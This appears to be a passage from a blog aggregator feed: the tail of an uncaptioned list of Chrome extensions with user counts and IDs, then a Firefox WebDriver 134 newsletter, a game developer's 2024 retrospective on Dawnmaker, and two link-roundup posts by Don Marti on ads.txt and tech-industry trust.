Adblock for YouTube & Chrome - All Block 400,000 jajikjbellknnfcomfjjinfjokihcfoi 1, 2, 3
AdBlocker - Ultimate Ads Blocker 1,000 jchookncibjnjddblpndekhkigpebmnn 1, 2, 3
Emoji Keyboard New 1,000 jddhjkckjlojegjdjlbobembgjoaobfc 6
Candy Match 3 Puzzle Games 2,000 jdffnpgoekmmkfgfflnpmonkldllfmbh 5
Genius PRO : Adblocker +Total Web Security 20,000 jdiegbdfmhkofahlnojgddehhelfmadj 3
Night Theme - Dark Mode 4,000,000 jhhjdfldilccfllhlbjdlhknlfbhpgeg 1, 2, 4
Jarvis AI: Chat GPT, Bing, Claude, Bard, BOT 10,000 kbhaffhbhcfmogkkbfanilniagcefnhi 1, 2
AI GPT 30,000 kblengdlefjpjkekanpoidgoghdngdgl 1
Dark Mode Chrome 300,000 kdllaademhdfbdhmphefcionnblmobff 1, 2, 4, 6
Pubg Wallpaper 1,000 kealimbjilfbnmolgombldemenlddfaa 5
Dark Shade 97 kfgpocchpfefpnecphkcjoammelpblce 1, 2
WA Contacts Extractor - wabulk.net 9,000 kfjafldijijoaeppnobnailkfjkjkhec 1
Video Downloader 10,000 kghcdbkokgjghlfeojcpeoclfnljkbdk 1, 2
ChatGPT of OpenAI for Google 10,000 kglajnlchongolikjlbcchdapioghjib 1, 2, 4, 6
Global Video & Audio Downloader 827 kglebmpdljhoplkjggohljkdhppbcenn 1, 2
Emoji keyboard online - copy&past your emoji. 1,000,000 kgmeffmlnkfnjpgmdndccklfigfhajen 1, 2, 4
Volume Booster - Increase sound 700,000 kjlooechnkmikejhimjlbdbkmmhlkkdd 1, 2, 4, 6
Yummi Fusion Game for Chrome 313 kknfaoaopblmapedlbhhicbnpdhlebff 5
Total Adblock 1,000 knnnjdihapcnbggclbihkkainodlapml 1, 2, 3, 7
Adblocker for Web 10,000 kojabglmkbdlpogbnenbdegoifgobklj 1, 2, 3, 4, 5
Simple Translator - Dictionary 800,000 koleblagfjjlhlkpacidojjnkhobeikd 1, 2, 3, 4, 6
Goku Ultra Instinct 40,000 kpehlpkidnkpifjmdgajdhhmcgdigjjn 6
Volume Booster - Increase Sound Effect 20,000 laldfbfjhaogodemgonegbingpmjldnh 1, 6
Zumba Mania Game - HTML5 Game 4,000 lckmeckmnopdeeelhglffajlfgodhoad 1
Comments Exporter 2,000 ldhjpljmgnggmkpcgaicmocfoefbcojl 1, 2
AdBlocker for LinkedIn® 100 leabdgiabfjhegkpomifpcfjfhlojcfh 3
Charm - Coupons, Promo Codes, & Discounts 366 lfbiblnhjmegapjfcbbodacjajhcgnbe 1, 2, 3, 5
Site Blocker: Stay focused & Block websites 2,000 lfbpllmokmhinnopfchemobgglipfini 1, 2
Youtube Ad Blocker 226 lfcgcabhmgenalfgamodjflggklmaldd 1, 2, 3
Video Downloader - Save m3u8 to MP4 10,000 lfdconleibeikjpklmlahaihpnkpmlch 1, 2
Contact Saver For WA & Download Group Phone Numbers - WPPME.COM 26 lfopjgadjgdlkjldhekplmeggobolnej 1, 6
ChatGenie for Chatgpt 8,000,000 lgfokdfepidpjodalhpbjindjackhidg 1, 2, 4
Mook: AI Tweet Generator With Chat GPT 259 lglmnbmfkbpfpbipjccjlkcgngekdhjk 1, 5
Anime Live Wallpapers 100,000 lgpgimkhbokanggfjjafplmjcdoclifl 6
ai logo creator 491 ljgimpibhgleapaoedngmcicjoifojea 1, 6
QR Code Generator 3,000,000 lkdokbndiffkmddlfpbjiokmfkafmgkm 1, 2, 4, 6
PDF Converter Online 10,000 lmgofgkjflllbmfdpamdjjmdjhohibpc 1, 2, 4
Video downloader by NNT 2,000 loiebadnnjhhmnphkihojemigfiondhf 1, 2, 6
WhichFont 75 lpamdogjnihpkoboakafmaiopljkhoib 5
Video Downloader Plus 100,000 lpcbiamenoghegpghidohnfegcepamdm 1, 2, 4
Summer Match 3 Game 613 lpfcolgfiohmgebkekkdakcoajfoeadn 5
Privacy Extension For WhatsApp Web - WABULK 90,000 mbcghjiodcjankhkllfohcgnckhdbkmi 1
Volume Booster + 800,000 mbdojfbhgijnafkihnkhllmhjhkmhedg 1, 2, 4, 6
Flux AI Image Generator 1,000 mblmjcogbjicpmhhjmpgjeiaophchpji 3
WA Group Number Exporter 5,000 mbmldhpfnohbacbljfnjnmhfmecndfjp 1, 5
Claude to Evernote 59 mekebjmippjiaajoaeeiemdcfngnnnkm 7
WA Number Checker - wabulk.net 8,000 meppipoogaadmolplfjchojpjdcaipgj 1
WA Number Checker 1,000 mgbpamnoiegnkologgggccldjenfchmc 1, 2
Translator - Click to Translate 451 mghganlaibcgnnooheoaebljgfbghpdl 1, 2, 4
ChatGPT Summary - summarize assistant 300,000 mikcekmbahpbehdpakenaknkkedeonhf 1, 2, 4, 6
Escape From School Game FEEP 2,000 mjkdllcbnonllpedjjmgdhkjnjmcigpo 5
Alfi Adventure Game 220 mkonckdeijcimlecklibjbnapmhnbpji 5
Allow Copy - Select & Enable Right Click 900,000 mmpljcghnbpkokhbkmfdmoagllopfmlm 1, 2
Save image to PDF 114 mpdpidnikijhgcbemphajoappcakdgok 5
Screensy - screen recording 3,000 mpiihicgfapopgaahidedijlddefkedc 1, 2
WhatsApp Salesforce integration 345 nacklnnkbcphbhgodnhfgnbdmobomlnm 5
Easy Ad Blocker 100,000 naffoicfphgmlgikpcmghdooejkboifd 3
Anime Girls Wallpaper 10,000 nahgmphhiadplbfoehklhedcbbieecak 5
PiP (Picture in picture) 800,000 nalkmonnmldhpfcpdlbdpljlaajlaphh 1, 2, 6
Vytal - Spoof Timezone, Geolocation & Locale 50,000 ncbknoohfjmcfneopnfkapmkblaenokb 1, 3, 5
Bass Booster Extreme - It Works! 10,000 ndhaplegimoabombidcdfogcnpmcicik 1, 2, 4
ProTranslator - Translator for All web 54 nemnbfdhbeigohoicapnbdecdlkcpmpj 1, 2, 4, 6
Adblock for Ytube 3,000 nendakennfmpoplpmpgnmcbpfabkibki 6
AI Image Generator - Text to Image Online 20,000 nfnkkmgbapopddmomigpnhcnffjdmfgo 1
Night Shift - Dark Theme for WEB 155 ngocaaiepgnlpdlpehhibnpmecaodfpk 1, 2, 4
Mad Shark HTML 5 Game 1,000 nhbckdjhkcjckhfgpmicgaiddbfdhhll 5
Screen Recorder 5,000 nhmaphcpolbbanpfhamgdpjlphbcnieh 1, 4
IgComment - IG Comments Export 545 nilbploiiciajeklaogbonjaejdjhfao 1
InReach - LinkedIn B2B Email Finder 1,000 nloekplnngjkjohmbfhmhjegijlnjfjk 5
Full Page Screenshot - Screen Capture 1,000 nmbngkjfkglbmmnlicoejhgaklphedcg 1, 2, 4
Exporter for Followers 400,000 nmnhoiehpdfllknopjkhjgoddkpnmfpa 1, 2
Flash Player - flash emulator 400,000 nohenbjhjbaleokplonjkbmackfkpcne 1, 2, 4, 6
Dark Mode Wallpapers 1,000 npmjehopohdlglmehokclpmbkgpfckcd 6
WhatsApp Audio & Voice Message to Text 112 npojienggkmiiemiolplijhfdmppacik 1, 6
Your Emoji Keyboard 1,000 obekkkgdekegaejajmdpaodefomoomfk 6
Adblock for Spotify - Skip ads on music 10,000 obiomemfgclpnflokpjjfokafbnoallb 1, 2
Manual Finder 2024 256 ocbfgbpocngolfigkhfehckgeihdhgll 5
Flash Player Enable - flash emulator swf 300,000 ocfjjghignicohbjammlhhoeimpfnlhc 1, 2
GT Cars Mega Ramp Game FEEP 630 ociihgpflooiebgncjgjkcaledmkhakk 5
Stick Panda Play Game 5,000 ocmbglodnmkcljocboijoemgceokifgg 5
Garena Free Fire Wallpaper 10,000 ocnnnfbblcadccdphieemnmbljdomdgl 5
Dictionary for Google Chrome - Synonyms, Definition 21 ocooohinghhdfcpfdonkjhhankdolpab 1, 3
Presto lead extractor for Bing Maps and OSM 300,000 oilholdcmnjkebdhokhaamalceecjbip 1, 2, 4
Dark Mode - Dark Theme for Chrome 60,000 okcnidefkngmnodelljeodakdlfemelg 1, 6
FastSave & Repost for Instagram 700,000 olenolhfominlkfmlkolcahemogebpcj 1, 2, 4, 6
ClaudeAI Copilot 449 olldnaaindiifeadpdmfggognmkofaib 1, 4, 5
Roblox Wallpaper 6,000 omamcjggpkjhgbkadieakplbieffjimf 5
Dark Reader for Chrome 10,000 omfeeokgnjnjcgdbppmnijlmdnpafmmp 1, 4
Browsec VPN - Free VPN for Chrome 6,000,000 omghfjlpggmjjaagoclmmobgdodcjboh 1, 2, 7
ChatGPT Sidebar 3,000 oopjmodaipafblnphackpcbodmgoggdo 1, 2, 3, 5
Music Equalizer - Improve Sound for everyone 900,000 paahdfldanmapppepgbflkhibebaeaof 1, 2, 4, 6
Space Pinball Game 968 pakghdcedniccgdfjjionnmoacelicmf 7
Find Font 2,000 pbeodbbpdamofbpkancdlfnegflmhkph 6
Web Client for Xiaohongshu 1,000 pcbppejbcaaoiaiddaglpphkmfkodhkn 1, 5
Classic Dark Theme - Night Mode 2,000,000 pdpfhanekfkeijhemmfbnnjffiblgefi 1, 2, 4, 6
Shopify Scraper - Shopify Store Scraper & spy 1,000 pehfmekejnhfofdjabaalbnanmpgjcdn 1, 2, 3
Screen Editor 869 pehmgdedmhpfophbaljpcloeaihhnkhk 6
Bulk WA Number Checker & Validator & Search & lookup 310 pepdpaiacpcgjoapmhehgmjcicninpgf 1, 6
Email Extractor 2,000 pgckgjnbljjlgbedbicefldnkpeehgdo 1, 3
Adblock for YouTube™ 30,000 pginoclcfbhkoomedcodiclncajkkcba 3, 4
Site Blocker - Block Site & Focus Mode 1,000,000 pgoeobojimoocdnilcajmjihiabcmabn 1, 2, 4, 5
Dark Mode - Midnight Chrome 1,000 pidmkmoocippkppbgebgjhnmgkhephlb 1, 2, 4, 5
Save Image As PNG 1,000 piigjafeabajlmjkcmcemimcoaekbjmh 1, 2
ChatGPT-The Future 2,000 pijagnpcnegcogimkghghdihobbeaicn 4, 6
Safe3 safe browsing 900,000 pimlkaibgdfmbenlhmbjllfkbcfhfnjg 1, 2
Fishing Frenzy Games 4,000 pkanjcjckofmachobaedghimjboglcjf 6
Fortnite Wallpapers 7,000 pnmfgeifakoehoojepggpigbkkfolbmk 6
Best Cursors - Bloom of Custom Cursor 100,000 pnpapokldhgeofbkljienpjofgjkafkm 1, 2, 4
Naruto Live Wallpaper 10,000 ppemmflajcphagebjphjfoggjcbmgpim 6

Firefox Developer Experience: Firefox WebDriver Newsletter 134

WebDriver is a remote control interface that enables introspection and control of user agents. As such, it can help developers verify that their websites work and perform well in all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 134 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you have ever wanted to contribute to an open source project used by millions of users, or are interested in gaining some experience in software development, jump in.

In Firefox 134, after working on bug fixes and improvements in previous releases, Dan (temidayoazeez032) implemented a completely new WebDriver BiDi command: browser.getClientWindows. Read more about this new feature in the detailed WebDriver BiDi updates below.

WebDriver code is written in JavaScript, Python, and Rust, so any web developer can contribute! Read how to set up the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Feel free to join our chatroom if you can’t see a bug that appeals to you; we can probably find a good task to get you started 🙂

WebDriver BiDi

Implemented the browser.getClientWindows command

Thanks again to Dan (temidayoazeez032) for this contribution. The browser.getClientWindows command allows clients to retrieve information about the currently open browser windows. This command does not take any parameters and returns a payload with a clientWindows property containing a list of browser.ClientWindowInfo objects.

The example below shows the output of the browser.getClientWindows command when two browser windows are open.

-> {
  "method": "browser.getClientWindows",
  "params": {},
  "id": 2
}

<- {
  "type": "success",
  "id": 2,
  "result": {
    "clientWindows": [
      {
        "active": false,
        "clientWindow": "8caf6a5d-944a-4709-ad0f-694418e3d262",
        "height": 971,
        "state": "normal",
        "width": 1280,
        "x": 4,
        "y": 38
      },
      {
        "active": true,
        "clientWindow": "be7dc2ed-d9ba-41d9-b864-dd9a6fabb9bf",
        "height": 971,
        "state": "normal",
        "width": 1280,
        "x": 26,
        "y": 60
      }
    ]
  }
}

This command will be especially useful in upcoming releases when the browser.setClientWindowState command is implemented, in order to update the dimensions of specific windows.

Support for initiatorType and destination fields in network events

The network.RequestData object present in all network events now includes two new fields: initiatorType and destination. Both are strings defined in the Fetch specification (see: initiator type, destination). The initiatorType field indicates what triggered the request, while the destination field indicates how the response will be used; refer to the Fetch specification for the various values they may be set to.

As an example, if a CSS file defines a background-image property for an element pointing to a url(), the corresponding request will have initiatorType set to "css" and destination set to "image".
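As a sketch of how a client might use these new fields, the snippet below groups simplified network event payloads by initiatorType. The payloads are hand-written assumptions for illustration (the BiDi event subscription plumbing is omitted), not captured traffic:

```python
# Sketch: filtering simplified network.RequestData payloads by the new
# initiatorType / destination fields. The event dicts are illustrative
# assumptions, not real captured WebDriver BiDi events.
events = [
    {"url": "https://example.com/style.css", "initiatorType": "link", "destination": "style"},
    {"url": "https://example.com/bg.png", "initiatorType": "css", "destination": "image"},
    {"url": "https://example.com/app.js", "initiatorType": "script", "destination": "script"},
]

def requests_triggered_by(events, initiator_type):
    """Return the URLs of requests whose initiatorType matches."""
    return [e["url"] for e in events if e["initiatorType"] == initiator_type]

# Requests triggered from CSS, e.g. background images:
print(requests_triggered_by(events, "css"))  # ['https://example.com/bg.png']
```

In the background-image scenario above, such a filter would surface the image request whose initiatorType is "css" and whose destination is "image".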

Bug fixes

Marionette

Install and uninstall addons on GeckoView

The Addon:Install and Addon:Uninstall commands are now available for GeckoView. This will make it easier to test extensions on the mobile versions of Firefox.

Added Private Browsing mode support to Addon:Install

The Addon:Install command can now be used to install extensions that are enabled in Private Browsing mode. Clients can pass an optional boolean allowPrivateBrowsing to Addon:Install; when it is true, the extension will be installed with Private Browsing mode enabled.
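As a rough sketch, a raw Addon:Install command carrying the new flag might be assembled as below. The message framing follows the Marionette JSON protocol's [type, id, command, params] shape, but the exact payload keys and the addon path are assumptions for illustration:

```python
import json

# Sketch of a Marionette "Addon:Install" command message with the new
# allowPrivateBrowsing flag. Framing ([0, msg_id, command, params]) and
# the parameter names are assumptions based on the Marionette protocol;
# the .xpi path is a placeholder.
def build_addon_install(msg_id, addon_path, allow_private_browsing=False):
    """Build a Marionette command message as [type, id, command, params]."""
    return [0, msg_id, "Addon:Install", {
        "path": addon_path,
        "allowPrivateBrowsing": allow_private_browsing,
    }]

message = build_addon_install(1, "/tmp/my-extension.xpi", allow_private_browsing=True)
print(json.dumps(message))
```

In practice you would send such a message through a Marionette client rather than constructing it by hand; the sketch only shows where the new boolean fits in the parameters.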

Adrian Gaudebert: The State of Adrian, 2024

A game release, finally some money for Arpentor Studio, and a difficult end of year: it's time for my 2024 retrospective!

Main projects

Arpentor Studio

Arpentor Studio's 2024 is a mixed bag: on one hand, we managed to release our first game, Dawnmaker, and that is a small miracle. On the other, we generated roughly €9,000 in revenue, which is very, very far from enough to keep a company running. There was still some good news at the end of the year, though, which opens up prospects for 2025.

Let's take things in order. The first half of the year was entirely focused on finishing and releasing Dawnmaker. There was some administrative work to do to open a Steam account and create a page for the game, and to request the final payments for the two grants we had received in 2022 (from BPI) and 2023 (from the Auvergne-Rhône-Alpes region). And of course there was the day-to-day management of the company: submitting invoices, updating the budget, that sort of thing. As in the previous year, Arpentor Studio didn't take up too much of my working time.

The highlight of 2024 was, of course, the release of Dawnmaker on July 31. As expected given the number of wishlists we had before launch, the game is a commercial failure, with about €5,000 in revenue in the first month (that is, €5k that actually landed in Arpentor Studio's accounts, but on which we will still have to pay taxes). On the other hand, the game was very well received on Steam, with a 93% positive review score. I wasn't expecting such a score, and it's a surprise that does the morale good. I have written a (long) Dawnmaker post-mortem, which I will publish in January, in which I go over everything about the game in detail.

Once Dawnmaker was out, we had to decide what to do with Arpentor Studio. Alexis (my business partner) and I decided not to keep working together, and I offered to buy the company from him. It isn't finalized yet, but we have reached an agreement: Arpentor will become a single-person company in early 2025, as soon as the paperwork is done. I intend to keep the company and to continue releasing games as my main activity, with perhaps some contract work here and there to bring in a bit of money.

However, something completely unexpected happened in October: a publisher contacted me about taking over the promotion of Dawnmaker! This almost never happens, since a game's release is the key moment when it makes money. I was therefore quite skeptical about the offer, but after two months of negotiations, we reached an agreement! So I am pleased to announce that, since December 12, Dawnmaker has been managed by Acram Digital, a Polish publisher specializing in digital board games.

The Acram team has taken over the management and promotion of Dawnmaker. They are responsible for its Steam page, and they have added the game to their various bundles and promotional tools; in exchange, they take a percentage of its sales. But they are also funding the game's mobile port, which I will be working on during the first three months of 2025. Dawnmaker should therefore arrive on your phones in the spring! This contract is excellent news for Arpentor Studio and for me: it brings in money that will stabilize the company financially, it will let me pay myself a little (which hasn't happened in several years), and it will also give me a bit more budget for the development of my next game!

So I am starting 2025 in a more stable position than before: Dawnmaker will keep bringing in money (not much, but not much is still better than nothing at all), and I have a plan to release a game within the year. It's going to be intense, as I have a lot to do and little time to do it, but I firmly intend not to repeat the mistake I made with Dawnmaker, namely spending two and a half years on a game that doesn't make money. My goal for 2025 is therefore to make a game in about six months, release it, and hope it earns a bit more than the previous one: just enough to let me make another, and so on. And who knows, maybe one day I'll make one that earns enough to move up to the next level?

Dawnmaker

That's it: you can buy Dawnmaker! (What? You haven't done it yet? Go get it!)

In 2024, I worked on many areas around the game:

  • Promotion: I created the game's Steam page, posted many times on social media (notably reddit), sent emails to youtubers, and wrote several posts for the blog and the newsletter, among other things.
  • Game design: the four big projects on the game in 2024 were making the Smog (the player's adversary) understandable, adding a tutorial, finalizing the meta-progression loop by adding a world map and a market, and designing two new characters with their respective decks and card pools.
  • Programming: of course I had to implement everything I just listed, but I also added a great deal of polish, feedback, and juice to the game, fixed bugs, and improved plenty of things based on player feedback. I also added an in-game form so players could easily send us their comments.
  • Community management: once the game was released, we received many comments from players on Steam and on our discord. I replied to as many of them as I could, and I also kept our players informed about game updates.

We released the game on July 31, then worked on a content update in which we added several playable characters and lots of new cards and buildings. We released that update on October 7, intending it to be the game's last content addition. Since then, I've published a minor update to fix bugs and smooth out some frustrating points. I thought that would be more or less it for Dawnmaker, but no! As I announced in the previous section, the game is coming to mobile platforms, so I still have several months of work ahead to implement phone support.

Still, this is the result of more than two and a half years of work, with two people full time and a dozen others contributing occasionally. I came out of it exhausted, both physically and mentally. The last months of 2024 were a slog for me; it was hard to get back to work, especially whenever creativity was required. But we shipped a game, a game that a sizable part of its audience enjoys, and which, incredible as it may be, ended up finding a publisher. A game I am very proud of.

Le Grand Œuvre

Here, as an exclusive, is the code name of my next video game. Le Grand Œuvre, or Magnum Opus, is the process of creating the Philosopher's Stone, the ultimate goal of alchemy. And that will be the theme of this next game: you will play an alchemist who, to cure themselves of a deadly poison, seeks to create the true Philosopher's Stone. The game will be a solo deckbuilder, without combat, halfway between Dominion and Balatro. You'll play your cards to gain resources, improve your stats, and use a forge to create new cards and magic stones. The game will have a roguelite structure: when you lose, you start over from scratch, but each time with a few improvements, newly unlocked cards, a more powerful forge, and so on.

The game is currently in the design phase, meaning I've written the vision document (with the pillars, the theme, the fantasy… ) and built a few prototypes to validate the core gameplay. I'll soon start preproduction, with the creation of a complete prototype of the game. I'll be able to reuse quite a few things I coded for Dawnmaker, notably the content editor, so I should be able to move fairly quickly on this game. And I'll have to, because my deadlines are tight! The goal is to have the game entirely finished by September of this year. In 8 months!

I'm lucky to have a small team motivated to join me on this project: two artists and a programmer. I can't wait to show you what we'll create together! Stay tuned!

Side projects

Souls

Unfortunately, Souls is still on hold. I brought it out for one session this summer, long enough to be reminded of all the current version's flaws, but I didn't take the time to rework it. It remains my passion project, and I still hope to get back to it one day!

Blog

I published 7 articles on my blog in 2024, and I wrote an 8th that isn't published yet: the Dawnmaker post-mortem, my longest article to date at more than 7,000 words. The goal of 6 published articles was therefore met, and even exceeded! Most of these articles did double duty as newsletter issues, so it's a win-win.

Here are the articles I published this year:

  1. L'état de l'Adrian 2023
  2. Dawnmaker a une page Steam ET un trailer
  3. Killing two birds with one deck in Dawnmaker
  4. The challenges of teaching a complex game
  5. The frustration of (never really) finishing Dawnmaker
  6. 18 days of selling Dawnmaker
  7. How much did Dawnmaker really cost?

I've found a system that works; now I need to keep up the pace in 2025!

Bourgade

After Dawnmaker, I wanted to get back into creating by reproducing something I had already done in 2020: a solo game jam. Well, it didn't work out: that very week, I got a phone call from a certain publisher interested in a certain game… But while I didn't manage to focus fully on this game for a week, I still kept at it here and there for a bit over a month, and I produced a game that is, let's say, playable, if nothing else. I haven't published it yet because there are no explanations anywhere, but I intend to take the time to put it online, if only so it doesn't sink into oblivion on my hard drive.

It's called Bourgade, and it's an incremental village-building game. You construct buildings that produce resources in real time and that you can upgrade. The higher their level, the more they produce, but the more they cost. On top of that, I added a world map where you can send soldiers to raid oases, heroes to go on adventures, and philosophers to produce culture points, the resource that wins you the game. The game lacks content and depth in its systems, and above all explanations, but the core is there. It remains to be seen whether that core is enjoyable and finds an audience, and whether it's worth continuing to develop Bourgade. I'll have an answer as soon as I take the time to run playtests!

Other games

I completely set aside all my other creative projects in 2024. Among the games I mentioned last year, the "Cube Light" one, inspired by the experience of a Magic: The Gathering draft, has the most potential, or at least it's the one I most want to come back to. I also have several other ideas in the drawer that I'd like to prototype, but I'm having trouble seeing how I'll manage that given the schedule I'm imposing on myself for the coming year to finish and release Le Grand Œuvre. Who knows, maybe I'll manage a few creative breaks?

My recommendations of the year

That's it for my review of what I did in 2024! Time to end this post on a lighter note, with my cultural recommendations of the year.

My video game of the year

Without a doubt, Balatro is my game of the year. It's an incredible game that pulls off the feat of having perfectly balanced systems. It's a plate balanced on a needle.

If you haven't heard of it, Balatro is a poker roguelite. You start each run with a classic 52-card deck (2 through 10, jack, queen, king, ace) and you have to reach higher and higher scores by making poker hands. Three cards of the same rank for three of a kind, five cards of the same suit for a flush, and so on. Of course there's a twist: over the course of a run you acquire jokers, which grant you point bonuses based on many parameters. One gives you more chips every time you play a pair, another doubles your score if you have four of a kind, and so on. Add tarot cards to modify the cards in your deck, planets to upgrade the scoring of your hands, and plenty more besides, and you get an incredible game that I warmly recommend.

My board game of the year

I played few new games this year, and the two I liked best I received for Christmas. Which is to say that as I write these words I haven't been able to play them much, but I'm still naming one of them: Legacy of Yu.

Legacy of Yu is a video game in board game form. It's a solo game (though I play it together with my partner) with a roguelite structure: you restart each game from scratch, but each time with a few changes. As the games go by, a book of stories tells you to remove this card and add those, changing what you can encounter in subsequent games. You play a Chinese official tasked with ending the devastating floods of the Yellow River. You recruit villagers you can use for resources or labor, you fight off bandits, and you have to dig canals along the river before the flood catches up with you. The game plays out as a campaign, each new game influenced by the previous ones, until you have won 7 times or lost 7 times.

From the lofty height of my two plays, I'm a big fan of how the game feels. You build your resource-generation engine, you feel the constant pressure of the flood and the bandits, you plan your turn and anticipate the next ones. There are lots of choices, and the additions you earn sometimes make the game easier by granting an extra power, sometimes harder by adding negative events or stronger brigands. I was skeptical about playing a solo board game, since for me the hobby is so tied to its social side, but it really works very well.

My comic of the year

Writing these recommendations, I realize that I simply consumed fewer cultural works in 2024. When it came to picking a board game, I took the last one I played, and when it came to picking a comic, I find I read really very few this year. There is still one I found better than the others: La Cuisine des Ogres – Trois Fois Morte.

It's the story of an abandoned little girl who is kidnapped by the Bogeyman. She miraculously escapes, but finds herself stuck in the magical land where ogres, talking cats, kraken, and other mystical creatures live. The story is gripping and the art superb. It's not a very ambitious comic, but it does the most important thing very well: telling a beautiful story.

My book of the year

Le Dieu d'Automne et d'Hiver is not the book I liked best this year (that honor goes to Je suis Pilgrim), but it's the one I most want to recommend, for three reasons. First, because it was still a read I loved: it's good fantasy, the main character is endearing, the detective-story plot is well crafted, and the very soft magic system works perfectly with the rest, without any deus ex machina or other "shut up, it's magic" plot devices.

The second reason is that it's written by a French author, Pauline Sidre, who is leveling up. The previous novel of hers I read, Rocaille, was already very good but had a few shortcomings. Here you can feel the quality has gone up a notch, and it's very pleasant.

And finally, it's published by Sillex, a small publisher trying to do better in a difficult industry, notably by paying its authors better. A chance to support good people!

Conclusions on 2024

2024 is ending on a difficult note. There was the enormous fatigue after Dawnmaker's release, combined with three chaotic months that jumbled together thinking about the next game, negotiating with a publisher, prototyping a new game, and more or less restful vacations.

2025 opens with a major challenge: learning from my mistakes and doing better. My biggest frustration with Dawnmaker is having spent far too long on it. I'm counting on myself not to repeat that with Le Grand Œuvre, and to finish it in 8 months. We'll talk about it all year long! Until then, thank you again for following my adventures, take care of yourselves, and see you soon.

Don Marti: ads.txt for a site with no ads

This site does not have programmatic ads on it.

But just in case, since there’s a lot of malarkey in the online advertising business, I’m putting up this file to let the advertisers know that if someone sold you an ad and claimed it ran on here, you got burned.

That’s the ads.txt file for this site. The format is defined in a specification from the IAB Tech Lab (PDF). The important part is the last line. The placeholder is how you tell the tools that are supposed to be checking this stuff that you don’t have ads.
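A minimal sketch of what such a file can look like, assuming the placeholder record as defined in the IAB Tech Lab ads.txt specification (`placeholder.example.com` is the literal value the spec prescribes, not a domain to substitute):

```
# ads.txt for a site that runs no programmatic ads.
# Lines starting with '#' are comments.
# This single placeholder record tells crawlers that no
# ad system is authorized to sell this site's inventory.
placeholder.example.com, placeholder, DIRECT, placeholder
```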

In other news, selling info on US citizens to North Korean murder robots is illegal now so we’ve got that going for us which is nice. See Justice Department Issues Final Rule Addressing Threat Posed by Foreign Adversaries’ Access to Americans’ Sensitive Personal Data

Related

Rachel explains Web page annoyances that I don’t inflict on you here in a handy list of web antipatterns. Removing more of these could be a good start to making a less frustrating, more accessible, higher performing site.

More useful things to check for security and performance: Securing your static website with HTTP response headers by Matt Hobbs. I have some of these set already but it’s helpful to have them all in one place. A browser can do a lot of stuff that a blog like this one won’t use, so safer to tell it not to.

Chris Coyier suggests that a list of Slash Pages could be a good list of blogging ideas. (That is a good idea. I made a list at /slashes and will fill it in. Ads.txt is technically not a page I guess since it’s just text but I’m counting it.)

Elie Berreby follows up on his search engine that’s forgotten how to search post with a long look at Search engines think I plagiarized my own content! My Hacker News Case Study. One of many parts that interests me about this whole issue is the problem of how much more money certain companies can make when returning a page on a sketchy infringing site than on the original. Typically an original content site is able to get a better ad deal than an illegal site that has to settle for scraps and leave more of the ad revenue for Google.

Simon Willison says, I still don’t think companies serve you ads based on spying through your microphone. For the accusation to be true, Apple would need to be recording those wake word audio snippets and transmitting them back to their servers for additional processing (likely true), but then they would need to be feeding those snippets in almost real time into a system which forwards them onto advertising partners who then feed that information into targeting networks such that next time you view an ad on your phone the information is available to help select the relevant ad. That is so far fetched. He’s totally right if you define your microphone as the microphone on your cell phone, which has limited battery energy and bandwidth. But most people own microphones, plural, and a smart TV or kitchen appliance is typically plugged in so the juice to process ambient audio for keywords is there.

Bonus links

In The long goodbye for Tim Cook, Manton Reece writes, Tim Cook gives $1 million to Trump’s inauguration committee. I think this event will be a turning point in how we view the Apple CEO. (imho the real turning point was the saga with the Chaos Monkeys guy. Cook intended to hire a high-profile former Facebook exec, and when it didn’t work he got surveillance-bro-pilled. Related: turn off advertising measurement in Apple Safari. Maybe if people are mad at Apple now, mice would like the VR goggles thing better?)

Chris Castle has a must-read update on Social Media Addiction Multidistrict Litigation–the return of Joe Camel in the sleeper case that could break Silicon Valley. Yes, the Big Tech companies filed a motion to dismiss because Section 230, but it was granted in part and denied in part (PDF). Here’s the case site: In re: Social Media Adolescent Addiction/Personal Injury Products Liability Litigation (MDL No. 3047) | United States District Court, Northern District of California

Dean W. Ball covers the Texas Responsible AI Governance Act in Texas Plows Ahead. (This bill doesn’t have a national defense exception the way the EU’s AI Act does, which is strange.)

I’m looking forward to the new Charles Stross novel that past me thoughtfully pre-ordered from Books Inc. for near future me. In A Conventional Boy a man was sentenced to prison for playing Dungeons and Dragons in the 1980s, and many years later he’s putting his escape plan into action…

Don Marti: Links for 4 Jan 2025: news from the low-trust society

Aram Zucker-Scharff writes, in Never Forgive Them,

If this year has revealed anything about the tech billionaires it is that they have a very specific philosophy other than just growth and that philosophy is malicious…I don’t think we can really take on the obstacle of, let’s call it more accurately, the scam economy without acknowledging this is all part of the design. They think they are richer than you and therefore you must be stupid and because you are stupid you should be controlled…

Read the whole thing. A lot of tech big shots want to play the rest of us like a real-time strategy game. (Ever notice that the list of skills in the we don’t hire US job applicants because the culture doesn’t value the following skills tweets is the same as the list of skills in the our AI has achieved human-level performance in the following skills tweets?) I predicted that low-trust society will trend in 2025, and I agree with Aram that a big part of that is company decision-makers deliberately making decisions that make it harder to trust others. I’m working on a list of known good companies. (Work in progress, please share yours if you have one.)

And yes, my link collecting tool has queued up a bunch of links about the shift towards a lower-trust society along with ways that people are adapting to it or trying to shift things back.

Opinion: We Need More Consequences for Reckless Driving. But That Doesn’t Mean More Punishment — Streetsblog USA (a lot of this is reactions to reactions to app-driven rat running through neighborhoods. Bollards can be a way to game the algorithm.)

Judge blocks parts of California bid to protect kids from social media (the ban on addictive feeds without consent is still there)

Self-Own (bullshit about economics, explained)

The Cows in the Coal Mine (bullshit about health, only getting worse)

This Year in Worker Conquests

Boeing strike ends after workers vote to accept “life-changing” wage increase

Steinar H. Gunderson: git.sesse.net goes IPv6-only (coping with AI scrapers)

OpenAI’s Board, Paraphrased: ‘To Succeed, All We Need Is Unimaginable Sums of Money’

Namma Yatri is a rideshare app that offers a better deal to drivers. Daily or per-trip flat rates, not a percentage

5 Rideshare Strategies That Are Complete BS

How to block Chrome from signing you into a Google account automatically

Leave Me Alone.

Firefox-maker Mozilla boosted revenue significantly in 2023, but the financial report may also raise concern

Google Cuts Thousands of Workers Improving Search After Search Results Scientifically Shown to Suck (a lot of the bullshit problem is downstream from Google’s labor/management issues)

